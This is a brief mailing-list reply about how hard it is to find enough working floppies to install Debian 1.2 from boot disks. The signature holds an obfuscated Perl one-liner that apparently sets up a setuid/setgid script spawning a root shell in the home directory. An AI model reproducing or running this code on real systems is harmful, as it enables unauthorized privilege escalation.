Re: 1.2 boot floppy

> I'm afraid so - I've been in several such conversations.  I thought it
> was rather strange that this seemed to be so important a question to
> them ...

The number of floppies seems trivial, until you try to round up 5 floppies
to install debian on to when you don't normally use floppies, and all you
have are AOL's cheaply made freebies and old floppies from years ago.
At one point, it took me 4 tries to install because the floppies kept
going bad on me.

--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod            jeh22@cornell.edu
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_